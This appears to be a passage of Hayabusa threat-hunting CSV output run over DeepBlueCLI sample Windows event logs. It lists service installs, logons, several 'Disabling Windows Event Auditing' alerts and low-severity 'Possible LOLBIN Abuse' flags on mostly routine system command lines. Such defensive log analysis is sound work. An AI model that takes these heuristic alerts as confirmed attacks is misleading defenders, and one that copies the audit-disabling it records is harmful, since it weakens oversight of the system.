Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - 
Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed 
Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: 
IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser 
| LID: 0x6831f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - 
System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: 
IEUser | LID: 0x1ee41,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target 
Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: 
IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event 
Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling 
Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: 